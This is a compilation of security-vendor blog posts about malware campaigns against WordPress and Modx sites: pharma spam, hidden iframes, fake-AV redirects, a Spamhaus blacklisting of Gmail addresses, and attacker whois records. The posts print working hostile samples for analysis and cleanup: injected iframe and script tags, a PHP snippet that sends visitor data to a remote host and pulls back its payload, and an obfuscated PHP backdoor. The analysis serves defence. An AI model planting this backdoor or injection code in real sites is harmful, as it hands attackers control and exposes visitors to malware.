We conducted a quick scan of their blog, we can see that it is being used to load all sorts of Pharma goodness:

By searching Google we can confirm ("Buy  Naltrexone" inurl:blog.success.com) that it has been there for a while:

We cannot emphasize enough how important it is to keep your web software and applications up to date. This includes your themes and plugins as well! In the case of Success Magazine, they are using WordPress v2.7.1, which is outdated and has known security bugs:

We already contacted them and hopefully they’ll get it squared away quickly. Situations like these should be a wake up call for blog owners that are using outdated versions of WordPress (or any application): Update ias soon as possible. Every day that goes by when running outdated software increases your risk of being hacked. It’s just bad for business, ultimately you may be putting visitors at risk and that’s a quick way to permanently lose traffic!

Protect your interwebs!

We are seeing lately many sites running Modx that are infected with a malware getting loaded from the file /manager/includes/document.parser.class.inc.php.

We don’t know yet how the sites are being hacked, but the interesting thing is that all of them are being “managed” by gcounter.cn (a famous malware site).

Basically a big code is added to the bottom of that file to call gcounter.cn to get what malicious iframe to send to the end user. Gcounter then responds with the proper one to load:

< i frame src=”http://sslsite.in/x/?src=Sirius&id=zerling&o=o” style=”display:none”>

or

< i frame src=”http://freematrix.in/x/?src=Sirius&id=zerling&o=o” style=”display:none”>

or

< i frame src=”http://solid-success.in/x/?src=Sirius&id=zerling&o=o” style=”display:none”>

or

< i frame src=”http://computerengine.in/x/?src=Sirius&id=zerling&o=o” style=”display:none

List of sites being used in this attack:

http://sslsite.in

http://freematrix.in/

http://solid-success.in/

http://basicreader.in/

http://computerengine.in/

http://easyclick.in/

http://enginecollector.in/

http://shieldsearch.in/

http://solidpool.in/

http://auto-booster.in/

http://rapid-debug.in/

http://06.1099hsd.co.cc/

http://06.dsdtsdz.co.cc/

Code decoded: http://sucuri.net/?page=tools&title=blacklist&detail=42d63a94574be7e43de1232cf53cc9be

We will post more details as we learn more about this attack.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad

$outsourceurl="http://ssl-validation.net/gt.php?site=”.urlencode($_SERVER['HTTP_HOST']).’&page=’.urlencode($_SERVER['REQUEST_URI']).’&ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&agent=’.urlencode($_SERVER['HTTP_USER_AGENT']);
$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.

The malicious site is hosted at 95.211.108.146.

Suggestion for hosting companies: Block this IP.

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

http://ouroue.com/se

In addition to remove the malicious code from the database (wp-posts table), you also need to remove an admin user that was added as part of this attack. It can have many names: JordanK, JoshuaH, MikeM, BettyJ, etc.

The way to identify the malicious user name is that his password will be set to $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ and the creation date will be set to 0000-00-00 00:00:00.

The following SQL will fix it up:

delete from wp_users where user_pass = ‘$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/’ AND user_registered = ’0000-00-00 00:00:00′;

We will be posting more details as we get them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).

Whois details:

Name: Alex Bodrov
Address: Polubotka 19-10
City: Chernigov
Province/state: Chernigov region
Country: UA
Postal Code: 34586
Phone: +48.7139123463
Fax: +48.7139123463
Email: alexbodrovqw@gmail.com

Name: Alexandr Borisenko
Address: Polubotka 81-38
City: kiev
Province/state: Kiev region
Country: UA
Postal Code: 45675
Email: 3807345466632@gmail.com

We will post more details as we learn them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

< script src = "http://sippa.dottasink.net/music/indi.php”></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

$ whois dottasink.net
..
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Yes, the same group behind “vancouvererrorsonfile, whereisdudescars and various other attacks (losotrana.com, zettapetta.com, etc).

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.

If your site is hacked, this script should clean it up: wordpress-fix.php or contact us for a professional, hands on clean-up (support@sucuri.net).

And when this site went down, guess what is showing up on Google:


Yes, that’s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg tadalafil, viagra, etc).

Just some of the affected sites:

www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
summits.aberdeen.com
www.greenway.org
www.oldlife.org

Finding them on Google is pretty simple as well: inurl:.org ” 5mg tadalafil” or you can also search for: “http://www.google-traffic-analytics.com” “Warning: file_get_contents” which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.

As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.

We will post more details when we have them.

Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.

It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor:

< OK: Host www.gmail.com clean.
—
> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.

Digging further:

$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23

Querying Spamhaus, we find:

74.125.227.21 is listed in the SBL, in the following records:
74.125.227.22 is listed in the SBL, in the following records:
74.125.227.23 is listed in the SBL, in the following records:
74.125.227.24 is listed in the SBL, in the following records:

Here is the probable reason they were blocked:

Spam Operation: Canadian Pharmacy
74.125.227.0/24 is listed on the SBL as being assigned to, being under the control of, or being otherwise connected with a known spam operation listed on the ROKSO database as: Canadian Pharmacy

Looking for more details, it seems that spammers were using docs.google.com to post some documents, which are stored in the same /24 as gmail. Spamhaus decided to blacklist the whole subnet. Details:

writely.l.google.com
Address: 74.125.227.1 – 74.125.227.15

Please stop supporting spammers.

You can start by removing the following.

————————————

http://docs.google.com/document/edit?id=1-ZumxEpeOxw2kcoZZUtuF_8pu0lQl5xkS8aV_dRN00c

http://docs.google.com/document/edit?id=10S8bRb38l1Ew8d_KVH3b2O46PPhRXYp4uv3gyNJICQs

http://docs.google.com/document/edit?id=10zmjlIiu_b-gzxBipgl8R2asyLYLLkj0OnzhEFALcW0

Details can be verified here: http://www.spamhaus.org/query/bl?ip=74.125.227.21 and here.

Check out Sucuri Security for a professional blacklist, Whois and malware monitoring solution.

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – - [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – - [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – - [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – - [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550

$ whois curingin.com
Registrant:
Icarus Kann Team
Icarus Kann (ikaruskann@ymail.com)
Potokaki
Elounda
Samos,81300
GR
Tel. +210.9882728

Requests from the IP address try to access a backdoor they’ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):

< ?php $a = ‘m’.'d5′;
if($a($_REQUEST[$a])==’698357e86842′.’1222bcf89349bd5cf34d’)
{$w = ‘Cdbl0sYoWOiyJt3qtqyOoqxA’;$x = $_REQUEST[$w];
$y = ‘base’.’6′;$y.= ’4_d’.'ecode’;$x = $y($x);$z = ‘creat’.'e_f’;
$z.= ‘unction’;$x = $z(”,$x);$x();} ?>

If your site is hacked and it keeps getting reinfected, look for this backdoor.

Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend W. Andrew Loe III did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).

That’s the first file the attackers uploaded to hack everything:
http://sucuri.net/?page=tools&title=blacklist&detail=7b1341a148b1d8a205587218f66ef912

You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:
http://sucuri.net/?page=tools&title=blacklist&detail=a9663c48164df1fcc59253aed5a0defc

This one is executed as well:
http://sucuri.net/?page=tools&title=blacklist&detail=eb5db5a81632a089fd07fa259c0448a6

So a very interesting and complex attack they’ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control.

If your site is infected and you need help, contact us. We’ll get your site cleaned up and malware-free right away.

Protect your interwebs!

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread only on Bluehost and Dreamhost, but it seems to be too early to tell how many sites are affected.

If your site is hacked, this script should clean it up: virus-fix.php or contact us for a professional help (support@sucuri.net).

However, what is interesting is the people behind this attack (and all others). Those domains are always registered by:

Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

You can check all the big ones that affected a large number of sites:

whereisdudescars.com
domainameat.cc
cloudisthebestnow.com
losotrana.com
indesignstudioinfo.com
zettapetta.com

All by the same group and all of them using the same tactics. We should start monitoring registrations using this domain and block them automatically.

We will post more details as we learn about it.